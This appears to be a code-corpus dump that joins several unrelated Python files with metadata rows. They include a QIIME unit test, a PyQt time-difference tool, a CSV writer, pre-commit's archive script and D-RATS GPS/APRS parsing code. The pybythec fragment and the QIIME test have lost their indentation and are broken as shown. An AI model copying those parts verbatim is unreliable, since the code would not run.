postScriptPath = pathRoot + '/pybythecPost.py'
if not os.path.exists(postScriptPath):
postScriptPath = pathRoot + '/.pybythecPost.py'
if os.path.exists(postScriptPath):
import imp
m = imp.load_source('', postScriptPath)
m.run(be)
| isc | 2,476,342,218,496,277,000 | 29.658784 | 146 | 0.638182 | false | 3.543538 | true | false | false |
wasade/qiime | tests/test_core_microbiome.py | 1 | 4217 | #!/usr/bin/env python
# File created on 08 Jun 2012
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME project"
__credits__ = ["Greg Caporaso"]
__license__ = "GPL"
__version__ = "1.8.0-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "[email protected]"
from unittest import TestCase, main
from biom.parse import parse_biom_table
from qiime.core_microbiome import (core_observations_across_sample_ids)
class ComputeCoreMicrobiomeTests(TestCase):
""" """
def setUp(self):
""" """
self.otu_table_data1 = parse_biom_table(otu_table1)
self.otu_table_data2 = parse_biom_table(otu_table2)
def test_core_observations_across_sample_ids(self):
""" core_observations_across_sample_ids functions as expected
"""
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.)
expected = ['o1', 'o5']
self.assertEqual(actual, expected)
# fraction_for_core = 0.5
actual = core_observations_across_sample_ids(self.otu_table_data1,
["S1", "s2"],
fraction_for_core=0.5)
expected = ['o1', 'o3', 'o5']
self.assertEqual(actual, expected)
def test_core_observations_across_sample_ids_invalid(self):
""" core_observations_across_sample_ids handles invalid input as expected
"""
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=1.001)
self.assertRaises(ValueError,
core_observations_across_sample_ids,
self.otu_table_data1,
["S1", "s2"],
fraction_for_core=-0.001)
def test_core_observations_across_sample_ids_no_core(self):
"""core_observations_across_sample_ids handles filtering all obs
"""
actual = core_observations_across_sample_ids(self.otu_table_data2,
["S1", "s2", "s3", "s4"],
fraction_for_core=1.)
expected = []
self.assertEqual(actual, expected)
otu_table1 = """{"rows": [{"id": "o1", "metadata": {"OTUMetaData": "Eukarya;Human"}}, {"id": "o2", "metadata": {"OTUMetaData": "Eukarya;Moose"}}, {"id": "o3", "metadata": {"OTUMetaData": "Eukarya;Galapagos Tortoise"}}, {"id": "o4", "metadata": {"OTUMetaData": "Eukarya;Bigfoot"}}, {"id": "o5", "metadata": {"OTUMetaData": "Eukarya;Chicken"}}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [0, 3, 60000.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:42:46.058411", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
otu_table2 = """{"rows": [{"id": "o1", "metadata": null}, {"id": "o2", "metadata": null}, {"id": "o3", "metadata": null}, {"id": "o4", "metadata": null}, {"id": "o5", "metadata": null}], "format": "Biological Observation Matrix 0.9.3", "data": [[0, 0, 105.0], [0, 1, 42.0], [0, 2, 99.0], [1, 2, 9.0], [1, 3, 99.0], [2, 0, 45.0], [4, 0, 1.0], [4, 1, 2.0], [4, 3, 3.0]], "columns": [{"id": "S1", "metadata": null}, {"id": "s2", "metadata": null}, {"id": "s3", "metadata": null}, {"id": "s4", "metadata": null}], "generated_by": "BIOM-Format 0.9.3", "matrix_type": "sparse", "shape": [5, 4], "format_url": "http://biom-format.org", "date": "2012-06-08T14:43:27.964500", "type": "OTU table", "id": null, "matrix_element_type": "float"}"""
if __name__ == "__main__":
main()
| gpl-2.0 | 8,308,714,476,410,311,000 | 55.986486 | 908 | 0.526678 | false | 3.06468 | true | false | false |
git-commit/TardisDiff | TardisDiff.py | 1 | 4981 | import sys
import os
import inspect
from PyQt5 import QtWidgets, QtCore, QtGui
import plugnplay
from uptime import boottime
from TardisUtil import TardisOptions, TimeSubmitter
class TardisDiff(QtWidgets.QMainWindow):
def __init__(self):
super(TardisDiff, self).__init__()
self.difference = 0
self.clipboard = QtWidgets.QApplication.clipboard()
# Set hot keys
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+C"), self,
self.setClipboard)
QtWidgets.QShortcut(QtGui.QKeySequence("Ctrl+Shift+T"), self,
self.notify_time_submitters)
self.options = TardisOptions()
# Get plugins
plugnplay.plugin_dirs = ['./plugins', ]
plugnplay.load_plugins()
# Get directory path
# From: http://stackoverflow.com/a/22881871/1963958
if getattr(sys, 'frozen', False): # py2exe, PyInstaller, cx_Freeze
script_path = os.path.abspath(sys.executable)
else:
script_path = inspect.getabsfile(TardisDiff)
script_path = os.path.realpath(script_path)
script_path = os.path.dirname(script_path)
# Google for a fancy tardis icon until I've made one
self.setWindowIcon(QtGui.QIcon(
os.path.join(script_path, 'icon', 'tardis-by-camilla-isabell-kasbo.ico')))
self.initUI()
def initUI(self):
# Create and initialize UI elements
self.contentWidget = QtWidgets.QWidget()
self.gridLayout = QtWidgets.QGridLayout(self.contentWidget)
self.formLayout = QtWidgets.QFormLayout()
self.timeEdit1 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEdit2 = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime = QtWidgets.QTimeEdit(self.contentWidget)
self.timeEditBreakTime.setDisplayFormat("h:mm")
self.timeEditBreakTime.setCurrentSection(
QtWidgets.QDateTimeEdit.MinuteSection)
self.timeEditBreakTime.setTime(QtCore.QTime(0, 30))
self.label_timeDiffOut = QtWidgets.QLabel(self.contentWidget)
self.button_time1_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.button_time2_now = QtWidgets.QPushButton(
"Now", self.contentWidget)
self.label_timeDiffOut.setText("")
self.timeEdit1.setTime(self.getStartTime())
self.timeEdit2.setTime(QtCore.QTime.currentTime())
# Add UI elements
row1 = QtWidgets.QHBoxLayout()
row1.addWidget(self.timeEdit1)
row1.addWidget(self.button_time1_now)
row2 = QtWidgets.QHBoxLayout()
row2.addWidget(self.timeEdit2)
row2.addWidget(self.button_time2_now)
self.formLayout.addRow("Time 1:", row1)
self.formLayout.addRow("Time 2:", row2)
self.formLayout.addRow("Break Time:", self.timeEditBreakTime)
self.formLayout.addRow("Difference:", self.label_timeDiffOut)
self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)
self.setCentralWidget(self.contentWidget)
self.statusBar()
# connect slots
self.timeEdit1.timeChanged.connect(self.inputChanged)
self.timeEdit2.timeChanged.connect(self.inputChanged)
self.timeEditBreakTime.timeChanged.connect(self.inputChanged)
self.button_time1_now.pressed.connect(self.reset_time1)
self.button_time2_now.pressed.connect(self.reset_time2)
self.setWindowTitle('TardisDiff')
self.inputChanged()
self.show()
def inputChanged(self):
"""
Checks both time inputs and the break time
input to determine the difference.
Then calls the method to update the ui.
"""
time1 = self.timeEdit1.time()
time2 = self.timeEdit2.time()
breakTime = self.timeEditBreakTime.time().secsTo(QtCore.QTime(0, 0))
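        # secsTo(QTime(0, 0)) is negative, so the break is subtracted from
        # the elapsed time; the result is expressed in hours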
self.difference = (time1.secsTo(time2) + breakTime) / 3600
self.difference = round(self.difference, 2)
self.label_timeDiffOut.setText(str(self.difference))
def reset_time1(self):
self.timeEdit1.setTime(QtCore.QTime.currentTime())
def reset_time2(self):
self.timeEdit2.setTime(QtCore.QTime.currentTime())
def setClipboard(self):
"""Sets the current diff text to clipboard"""
self.clipboard.setText(str(self.difference))
self.statusBar().showMessage("Copied to clipboard.")
def getStartTime(self):
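        # start time comes from the machine's boot time when the option is
        # set to auto, otherwise from the configured start time string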
return TardisDiff.getBootTimeAsQTime()\
if self.options.isStartTimeAuto()\
else QtCore.QTime.fromString(self.options.getStartTime())
def notify_time_submitters(self):
TimeSubmitter.submit_time(self.difference)
@staticmethod
def getBootTimeAsQTime():
return QtCore.QDateTime(boottime()).time()
def main():
app = QtWidgets.QApplication(sys.argv)
ed = TardisDiff()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| isc | 2,382,846,917,862,565,000 | 35.094203 | 86 | 0.656495 | false | 3.770628 | false | false | false |
PPKE-Bioinf/consensx.itk.ppke.hu | consensx/storage/csv.py | 1 | 1205 | class CSVBuffer(object):
"""Class which stores data for values.CSV"""
def __init__(self, my_path):
self.working_dir = my_path
self.max_resnum = -1
self.min_resnum = 100000
self.csv_data = []
def add_data(self, data):
self.csv_data.append(data)
def write_csv(self):
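        # header row holds an EXP/CALC column pair per dataset, followed by
        # one row per residue number from min_resnum to max_resnum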
filename = self.working_dir + "values.csv"
output_csv = open(filename, 'w')
output_csv.write(',')
for data in self.csv_data:
output_csv.write(data["name"] + " EXP, " + data["name"] + " CALC,")
output_csv.write("\n")
for resnum in range(self.min_resnum, self.max_resnum + 1):
output_csv.write(str(resnum) + ',')
for data in self.csv_data:
exp = {}
for i in data["experimental"]:
exp[i.resnum] = i.value
try:
output_csv.write(
"{0:.2f}".format(exp[resnum]) + ',' +
"{0:.2f}".format(data["calced"][resnum]) + ','
)
except (IndexError, KeyError):
output_csv.write(',,')
output_csv.write("\n")
| mit | 8,709,585,037,877,639,000 | 31.567568 | 79 | 0.46971 | false | 3.753894 | false | false | false |
philipgian/pre-commit | pre_commit/make_archives.py | 1 | 2079 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import tarfile
from pre_commit import five
from pre_commit import output
from pre_commit.util import cmd_output
from pre_commit.util import cwd
from pre_commit.util import rmtree
from pre_commit.util import tmpdir
# This is a script for generating the tarred resources for git repo
# dependencies. Currently it's just for "vendoring" ruby support packages.
REPOS = (
('rbenv', 'git://github.com/rbenv/rbenv', 'e60ad4a'),
('ruby-build', 'git://github.com/rbenv/ruby-build', '9bc9971'),
(
'ruby-download',
'git://github.com/garnieretienne/rvm-download',
'09bd7c6',
),
)
RESOURCES_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), 'resources')
)
def make_archive(name, repo, ref, destdir):
"""Makes an archive of a repository in the given destdir.
:param text name: Name to give the archive. For instance foo. The file
that is created will be called foo.tar.gz.
:param text repo: Repository to clone.
:param text ref: Tag/SHA/branch to check out.
:param text destdir: Directory to place archives in.
"""
output_path = os.path.join(destdir, name + '.tar.gz')
with tmpdir() as tempdir:
# Clone the repository to the temporary directory
cmd_output('git', 'clone', repo, tempdir)
with cwd(tempdir):
cmd_output('git', 'checkout', ref)
# We don't want the '.git' directory
# It adds a bunch of size to the archive and we don't use it at
# runtime
rmtree(os.path.join(tempdir, '.git'))
with tarfile.open(five.n(output_path), 'w|gz') as tf:
tf.add(tempdir, name)
return output_path
def main():
for archive_name, repo, ref in REPOS:
output.write_line('Making {}.tar.gz for {}@{}'.format(
archive_name, repo, ref,
))
make_archive(archive_name, repo, ref, RESOURCES_DIR)
if __name__ == '__main__':
exit(main())
| mit | -5,814,434,410,959,443,000 | 27.875 | 76 | 0.644541 | false | 3.511824 | false | false | false |
coddingtonbear/d-rats | d_rats/gps.py | 1 | 33132 | import re
import time
import tempfile
import platform
import datetime
import subst
import threading
import serial
import socket
from math import pi,cos,acos,sin,atan2
import utils
if __name__ == "__main__":
import gettext
gettext.install("D-RATS")
TEST = "$GPGGA,180718.02,4531.3740,N,12255.4599,W,1,07,1.4,50.6,M,-21.4,M,,*63 KE7JSS ,440.350+ PL127.3"
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
DEGREE = u"\u00b0"
DPRS_TO_APRS = {}
# The DPRS to APRS mapping is pretty horrific, but the following
# attempts to create a mapping based on looking at the javascript
# for DPRSCalc and a list of regular APRS symbols
#
# http://ham-shack.com/aprs_pri_symbols.html
# http://www.aprs-is.net/DPRSCalc.aspx
for i in range(0, 26):
asciival = ord("A") + i
char = chr(asciival)
pri = "/"
sec = "\\"
DPRS_TO_APRS["P%s" % char] = pri + char
DPRS_TO_APRS["L%s" % char] = pri + char.lower()
DPRS_TO_APRS["A%s" % char] = sec + char
DPRS_TO_APRS["S%s" % char] = sec + char.lower()
if i <= 15:
pchar = chr(ord(" ") + i)
DPRS_TO_APRS["B%s" % char] = pri + pchar
DPRS_TO_APRS["O%s" % char] = sec + pchar
elif i >= 17:
pchar = chr(ord(" ") + i + 9)
DPRS_TO_APRS["M%s" % char] = pri + pchar
DPRS_TO_APRS["N%s" % char] = sec + pchar
if i <= 5:
char = chr(ord("S") + i)
pchar = chr(ord("[") + i)
DPRS_TO_APRS["H%s" % char] = pri + pchar
DPRS_TO_APRS["D%s" % char] = sec + pchar
#for k in sorted(DPRS_TO_APRS.keys()):
# print "%s => %s" % (k, DPRS_TO_APRS[k])
APRS_TO_DPRS = {}
for k,v in DPRS_TO_APRS.items():
APRS_TO_DPRS[v] = k
def dprs_to_aprs(symbol):
if len(symbol) < 2:
print "Invalid DPRS symbol: `%s'" % symbol
return None
else:
return DPRS_TO_APRS.get(symbol[0:2], None)
def parse_dms(string):
string = string.replace(u"\u00b0", " ")
string = string.replace('"', ' ')
string = string.replace("'", ' ')
string = string.replace(' ', ' ')
string = string.strip()
try:
(d, m, s) = string.split(' ', 3)
deg = int(d)
min = int(m)
sec = float(s)
except Exception, e:
deg = min = sec = 0
if deg < 0:
mul = -1
else:
mul = 1
deg = abs(deg)
return (deg + (min / 60.0) + (sec / 3600.0)) * mul
def set_units(units):
global EARTH_RADIUS
global EARTH_UNITS
if units == _("Imperial"):
EARTH_RADIUS = 3963.1
EARTH_UNITS = "mi"
elif units == _("Metric"):
EARTH_RADIUS = 6380.0
EARTH_UNITS = "km"
print "Set GPS units to %s" % units
def value_with_units(value):
if value < 0.5:
if EARTH_UNITS == "km":
scale = 1000
units = "m"
elif EARTH_UNITS == "mi":
scale = 5280
units = "ft"
else:
scale = 1
units = EARTH_UNITS
else:
scale = 1
units = EARTH_UNITS
return "%.2f %s" % (value * scale, units)
def NMEA_checksum(string):
checksum = 0
for i in string:
checksum ^= ord(i)
return "*%02x" % checksum
def GPSA_checksum(string):
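    # GPS-A (APRS over D-STAR) checksum: a bit-reflected CRC-16 over the
    # sentence body (polynomial 0x8408, initial value 0xffff, final inversion)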
def calc(buf):
icomcrc = 0xffff
for _char in buf:
char = ord(_char)
for i in range(0, 8):
xorflag = (((icomcrc ^ char) & 0x01) == 0x01)
icomcrc = (icomcrc >> 1) & 0x7fff
if xorflag:
icomcrc ^= 0x8408
char = (char >> 1) & 0x7f
return (~icomcrc) & 0xffff
return calc(string)
def DPRS_checksum(callsign, msg):
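    # DPRS checksum: XOR of every character of "CALLSIGN,message", with the
    # callsign left-justified to eight characters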
csum = 0
string = "%-8s,%s" % (callsign, msg)
for i in string:
csum ^= ord(i)
return "*%02X" % csum
def deg2rad(deg):
return deg * (pi / 180)
def rad2deg(rad):
return rad / (pi / 180)
def dm2deg(deg, min):
return deg + (min / 60.0)
def deg2dm(decdeg):
deg = int(decdeg)
min = (decdeg - deg) * 60.0
return deg, min
def nmea2deg(nmea, dir="N"):
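    # NMEA packs coordinates as ddmm.mmmm (degrees * 100 + decimal minutes);
    # split the two parts and convert to signed decimal degrees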
deg = int(nmea) / 100
try:
min = nmea % (deg * 100)
except ZeroDivisionError, e:
min = int(nmea)
if dir == "S" or dir == "W":
m = -1
else:
m = 1
return dm2deg(deg, min) * m
def deg2nmea(deg):
deg, min = deg2dm(deg)
return (deg * 100) + min
def meters2feet(meters):
return meters * 3.2808399
def feet2meters(feet):
return feet * 0.3048
def distance(lat_a, lon_a, lat_b, lon_b):
lat_a = deg2rad(lat_a)
lon_a = deg2rad(lon_a)
lat_b = deg2rad(lat_b)
lon_b = deg2rad(lon_b)
earth_radius = EARTH_RADIUS
#print "cos(La)=%f cos(la)=%f" % (cos(lat_a), cos(lon_a))
#print "cos(Lb)=%f cos(lb)=%f" % (cos(lat_b), cos(lon_b))
#print "sin(la)=%f" % sin(lon_a)
#print "sin(lb)=%f" % sin(lon_b)
#print "sin(La)=%f sin(Lb)=%f" % (sin(lat_a), sin(lat_b))
#print "cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b) = %f" % (\
# cos(lat_a) * cos(lon_a) * cos(lat_b) * cos(lon_b))
#print "cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b) = %f" % (\
# cos(lat_a) * sin(lon_a) * cos(lat_b) * sin(lon_b))
#print "sin(lat_a) * sin(lat_b) = %f" % (sin(lat_a) * sin(lat_b))
tmp = (cos(lat_a) * cos(lon_a) * \
cos(lat_b) * cos(lon_b)) + \
(cos(lat_a) * sin(lon_a) * \
cos(lat_b) * sin(lon_b)) + \
(sin(lat_a) * sin(lat_b))
# Correct round-off error (which is just *silly*)
if tmp > 1:
tmp = 1
elif tmp < -1:
tmp = -1
distance = acos(tmp)
return distance * earth_radius
def parse_date(string, fmt):
try:
return datetime.datetime.strptime(string, fmt)
except AttributeError, e:
print "Enabling strptime() workaround for Python <= 2.4.x"
vals = {}
for c in "mdyHMS":
i = fmt.index(c)
vals[c] = int(string[i-1:i+1])
if len(vals.keys()) != (len(fmt) / 2):
raise Exception("Not all date bits converted")
return datetime.datetime(vals["y"] + 2000,
vals["m"],
vals["d"],
vals["H"],
vals["M"],
vals["S"])
class GPSPosition(object):
"""Represents a position on the globe, either from GPS data or a static
positition"""
def _from_coords(self, lat, lon, alt=0):
try:
self.latitude = float(lat)
except ValueError:
self.latitude = parse_dms(lat)
try:
self.longitude = float(lon)
except ValueError:
self.longitude = parse_dms(lon)
self.altitude = float(alt)
self.satellites = 3
self.valid = True
def _parse_dprs_comment(self):
symbol = self.comment[0:4].strip()
astidx = self.comment.rindex("*")
checksum = self.comment[astidx:]
_checksum = DPRS_checksum(self.station, self.comment[:astidx])
if int(_checksum[1:], 16) != int(checksum[1:], 16):
print "CHECKSUM(%s): %s != %s" % (self.station,
int(_checksum[1:], 16),
int(checksum[1:], 16))
#print "Failed to parse DPRS comment:"
#print " Comment: |%s|" % self.comment
#print " Check: %s %s (%i)" % (checksum, _checksum, astidx)
raise Exception("DPRS checksum failed")
self.APRSIcon = dprs_to_aprs(symbol)
self.comment = self.comment[4:astidx].strip()
def __init__(self, lat=0, lon=0, station="UNKNOWN"):
self.valid = False
self.altitude = 0
self.satellites = 0
self.station = station
self.comment = ""
self.current = None
self.date = datetime.datetime.now()
self.speed = None
self.direction = None
self.APRSIcon = None
self._original_comment = ""
self._from_coords(lat, lon)
def __iadd__(self, update):
self.station = update.station
if not update.valid:
return self
if update.satellites:
self.satellites = update.satellites
if update.altitude:
self.altitude = update.altitude
self.latitude = update.latitude
self.longitude = update.longitude
self.date = update.date
if update.speed:
self.speed = update.speed
if update.direction:
self.direction = update.direction
if update.comment:
self.comment = update.comment
self._original_comment = update._original_comment
if update.APRSIcon:
self.APRSIcon = update.APRSIcon
return self
def __str__(self):
if self.valid:
if self.current:
dist = self.distance_from(self.current)
bear = self.current.bearing_to(self)
distance = " - %.1f %s " % (dist, EARTH_UNITS) + \
_("away") + \
" @ %.1f " % bear + \
_("degrees")
else:
distance = ""
if self.comment:
comment = " (%s)" % self.comment
else:
comment = ""
if self.speed and self.direction:
if EARTH_UNITS == "mi":
speed = "%.1f mph" % (float(self.speed) * 1.15077945)
elif EARTH_UNITS == "m":
speed = "%.1f km/h" % (float(self.speed) * 1.852)
else:
speed = "%.2f knots" % float(self.speed)
dir = " (" + _("Heading") +" %.0f at %s)" % (self.direction,
speed)
else:
dir = ""
if EARTH_UNITS == "mi":
alt = "%i ft" % meters2feet(self.altitude)
else:
alt = "%i m" % self.altitude
return "%s " % self.station + \
_("reporting") + \
" %.4f,%.4f@%s at %s%s%s%s" % ( \
self.latitude,
self.longitude,
alt,
self.date.strftime("%H:%M:%S"),
subst.subst_string(comment),
distance,
dir)
else:
return "(" + _("Invalid GPS data") + ")"
def _NMEA_format(self, val, latitude):
if latitude:
if val > 0:
d = "N"
else:
d = "S"
else:
if val > 0:
d = "E"
else:
d = "W"
return "%.3f,%s" % (deg2nmea(abs(val)), d)
def station_format(self):
if " " in self.station:
call, extra = self.station.split(" ", 1)
sta = "%-7.7s%1.1s" % (call.strip(),
extra.strip())
else:
sta = self.station
return sta
def to_NMEA_GGA(self, ssid=" "):
"""Returns an NMEA-compliant GPGGA sentence"""
date = time.strftime("%H%M%S")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
data = "GPGGA,%s,%s,%s,1,%i,0,%i,M,0,M,," % ( \
date,
lat,
lon,
self.satellites,
self.altitude)
sta = self.station_format()
# If we had an original comment (with some encoding), use that instead
if self._original_comment:
com = self._original_comment
else:
com = self.comment
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
com)
def to_NMEA_RMC(self):
"""Returns an NMEA-compliant GPRMC sentence"""
tstamp = time.strftime("%H%M%S")
dstamp = time.strftime("%d%m%y")
lat = self._NMEA_format(self.latitude, True)
lon = self._NMEA_format(self.longitude, False)
if self.speed:
speed = "%03.1f" % self.speed
else:
speed = "000.0"
if self.direction:
dir = "%03.1f" % self.direction
else:
dir = "000.0"
data = "GPRMC,%s,A,%s,%s,%s,%s,%s,000.0,W" % ( \
tstamp,
lat,
lon,
speed,
dir,
dstamp)
sta = self.station_format()
return "$%s%s\r\n%-8.8s,%-20.20s\r\n" % (data,
NMEA_checksum(data),
sta,
self.comment)
def to_APRS(self, dest="APRATS", symtab="/", symbol=">"):
"""Returns a GPS-A (APRS-compliant) string"""
stamp = time.strftime("%H%M%S", time.gmtime())
if " " in self.station:
sta = self.station.replace(" ", "-")
else:
sta = self.station
s = "%s>%s,DSTAR*:/%sh" % (sta, dest, stamp)
if self.latitude > 0:
ns = "N"
Lm = 1
else:
ns = "S"
Lm = -1
if self.longitude > 0:
ew = "E"
lm = 1
else:
ew = "W"
lm = -1
s += "%07.2f%s%s%08.2f%s%s" % (deg2nmea(self.latitude * Lm), ns,
symtab,
deg2nmea(self.longitude * lm), ew,
symbol)
if self.speed and self.direction:
s += "%03.0f/%03.0f" % (float(self.direction), float(self.speed))
if self.altitude:
s += "/A=%06i" % meters2feet(float(self.altitude))
else:
s += "/"
if self.comment:
l = 43
if self.altitude:
l -= len("/A=xxxxxx")
s += "%s" % self.comment[:l]
s += "\r"
return "$$CRC%04X,%s\n" % (GPSA_checksum(s), s)
def set_station(self, station, comment="D-RATS"):
self.station = station
self.comment = comment
self._original_comment = comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
def distance_from(self, pos):
return distance(self.latitude, self.longitude,
pos.latitude, pos.longitude)
def bearing_to(self, pos):
lat_me = deg2rad(self.latitude)
lon_me = deg2rad(self.longitude)
lat_u = deg2rad(pos.latitude)
lon_u = deg2rad(pos.longitude)
lat_d = deg2rad(pos.latitude - self.latitude)
lon_d = deg2rad(pos.longitude - self.longitude)
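        # initial bearing (forward azimuth) from this position to pos,
        # normalized to 0-360 degrees at the return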
y = sin(lon_d) * cos(lat_u)
x = cos(lat_me) * sin(lat_u) - \
sin(lat_me) * cos(lat_u) * cos(lon_d)
bearing = rad2deg(atan2(y, x))
return (bearing + 360) % 360
def set_relative_to_current(self, current):
self.current = current
def coordinates(self):
return "%.4f,%.4f" % (self.latitude, self.longitude)
def fuzzy_to(self, pos):
dir = self.bearing_to(pos)
dirs = ["N", "NNE", "NE", "ENE", "E",
"ESE", "SE", "SSE", "S",
"SSW", "SW", "WSW", "W",
"WNW", "NW", "NNW"]
delta = 22.5
angle = 0
direction = "?"
for i in dirs:
if dir > angle and dir < (angle + delta):
direction = i
angle += delta
return "%.1f %s %s" % (self.distance_from(pos),
EARTH_UNITS,
direction)
class NMEAGPSPosition(GPSPosition):
"""A GPSPosition initialized from a NMEA sentence"""
def _test_checksum(self, string, csum):
try:
idx = string.index("*")
except:
print "String does not contain '*XY' checksum"
return False
segment = string[1:idx]
csum = csum.upper()
_csum = NMEA_checksum(segment).upper()
if csum != _csum:
print "Failed checksum: %s != %s" % (csum, _csum)
return csum == _csum
def _parse_GPGGA(self, string):
elements = string.split(",", 14)
if len(elements) < 15:
raise Exception("Unable to split GPGGA" % len(elements))
t = time.strftime("%m%d%y") + elements[1]
if "." in t:
t = t.split(".")[0]
self.date = parse_date(t, "%m%d%y%H%M%S")
self.latitude = nmea2deg(float(elements[2]), elements[3])
self.longitude = nmea2deg(float(elements[4]), elements[5])
print "%f,%f" % (self.latitude, self.longitude)
self.satellites = int(elements[7])
self.altitude = float(elements[9])
m = re.match("^([0-9]*)(\*[A-z0-9]{2})\r?\n?(.*)$", elements[14])
if not m:
raise Exception("No checksum (%s)" % elements[14])
csum = m.group(2)
if "," in m.group(3):
sta, com = m.group(3).split(",", 1)
if not sta.strip().startswith("$"):
self.station = utils.filter_to_ascii(sta.strip()[0:8])
self.comment = utils.filter_to_ascii(com.strip()[0:20])
self._original_comment = self.comment
if len(self.comment) >=7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
self.valid = self._test_checksum(string, csum)
def _parse_GPRMC(self, string):
if "\r\n" in string:
nmea, station = string.split("\r\n", 1)
else:
nmea = string
station = ""
elements = nmea.split(",", 12)
if len(elements) < 12:
raise Exception("Unable to split GPRMC (%i)" % len(elements))
t = elements[1]
d = elements[9]
if "." in t:
t = t.split(".", 2)[0]
self.date = parse_date(d+t, "%d%m%y%H%M%S")
self.latitude = nmea2deg(float(elements[3]), elements[4])
self.longitude = nmea2deg(float(elements[5]), elements[6])
self.speed = float(elements[7])
self.direction = float(elements[8])
if "*" in elements[11]:
end = 11 # NMEA <=2.0
elif "*" in elements[12]:
end = 12 # NMEA 2.3
else:
raise Exception("GPRMC has no checksum in 12 or 13")
m = re.match("^.?(\*[A-z0-9]{2})", elements[end])
if not m:
print "Invalid end: %s" % elements[end]
return
csum = m.group(1)
if "," in station:
sta, com = station.split(",", 1)
self.station = utils.filter_to_ascii(sta.strip())
self.comment = utils.filter_to_ascii(com.strip())
self._original_comment = self.comment
if len(self.comment) >= 7 and "*" in self.comment[-3:-1]:
self._parse_dprs_comment()
if elements[2] != "A":
self.valid = False
print "GPRMC marked invalid by GPS (%s)" % elements[2]
else:
print "GPRMC is valid"
self.valid = self._test_checksum(string, csum)
def _from_NMEA_GPGGA(self, string):
string = string.replace('\r', ' ')
string = string.replace('\n', ' ')
try:
self._parse_GPGGA(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def _from_NMEA_GPRMC(self, string):
try:
self._parse_GPRMC(string)
except Exception, e:
import traceback
import sys
traceback.print_exc(file=sys.stdout)
print "Invalid GPS data: %s" % e
self.valid = False
def __init__(self, sentence, station=_("UNKNOWN")):
GPSPosition.__init__(self)
if sentence.startswith("$GPGGA"):
self._from_NMEA_GPGGA(sentence)
elif sentence.startswith("$GPRMC"):
self._from_NMEA_GPRMC(sentence)
else:
print "Unsupported GPS sentence type: %s" % sentence
class APRSGPSPosition(GPSPosition):
def _parse_date(self, string):
prefix = string[0]
suffix = string[-1]
digits = string[1:-1]
if suffix == "z":
ds = digits[0:2] + \
time.strftime("%m%y", time.gmtime()) + \
digits[2:] + "00"
elif suffix == "/":
ds = digits[0:2] + time.strftime("%m%y") + digits[2:] + "00"
elif suffix == "h":
ds = time.strftime("%d%m%y", time.gmtime()) + digits
else:
print "Unknown APRS date suffix: `%s'" % suffix
return datetime.datetime.now()
d = parse_date(ds, "%d%m%y%H%M%S")
if suffix in "zh":
delta = datetime.datetime.utcnow() - datetime.datetime.now()
else:
delta = datetime.timedelta(0)
return d - delta
def _parse_GPSA(self, string):
m = re.match("^\$\$CRC([A-Z0-9]{4}),(.*)$", string)
if not m:
return
crc = m.group(1)
_crc = "%04X" % GPSA_checksum(m.group(2))
if crc != _crc:
print "APRS CRC mismatch: %s != %s (%s)" % (crc, _crc, m.group(2))
return
elements = string.split(",")
if not elements[0].startswith("$$CRC"):
print "Missing $$CRC..."
return
self.station, dst = elements[1].split(">")
path, data = elements[2].split(":")
# 1 = Entire stamp or ! or =
# 2 = stamp prefix
# 3 = stamp suffix
# 4 = latitude
# 5 = N/S
# 6 = symbol table
# 7 = longitude
# 8 = E/W
# 9 = symbol
#10 = comment
#11 = altitude string
expr = "^(([@/])[0-9]{6}([/hz])|!|=)" + \
"([0-9]{1,4}\.[0-9]{2})([NS])(.)?" + \
"([0-9]{5}\.[0-9]{2})([EW])(.)" + \
"([^/]*)(/A=[0-9]{6})?"
m = re.search(expr, data)
if not m:
print "Did not match GPS-A: `%s'" % data
return
if m.group(1) in "!=":
self.date = datetime.datetime.now()
elif m.group(2) in "@/":
self.date = self._parse_date(m.group(1))
else:
print "Unknown timestamp prefix: %s" % m.group(1)
self.date = datetime.datetime.now()
self.latitude = nmea2deg(float(m.group(4)), m.group(5))
self.longitude = nmea2deg(float(m.group(7)), m.group(8))
self.comment = m.group(10).strip()
self._original_comment = self.comment
self.APRSIcon = m.group(6) + m.group(9)
if len(m.groups()) == 11 and m.group(11):
_, alt = m.group(11).split("=")
self.altitude = feet2meters(int(alt))
self.valid = True
def _from_APRS(self, string):
self.valid = False
try:
self._parse_GPSA(string)
except Exception, e:
print "Invalid APRS: %s" % e
return False
return self.valid
def __init__(self, message):
GPSPosition.__init__(self)
self._from_APRS(message)
class MapImage(object):
def __init__(self, center):
self.key = "ABQIAAAAWot3KuWpenfCAGfQ65FdzRTaP0xjRaMPpcw6bBbU2QUEXQBgHBR5Rr2HTGXYVWkcBFNkPvxtqV4VLg"
self.center = center
self.markers = [center]
def add_markers(self, markers):
self.markers += markers
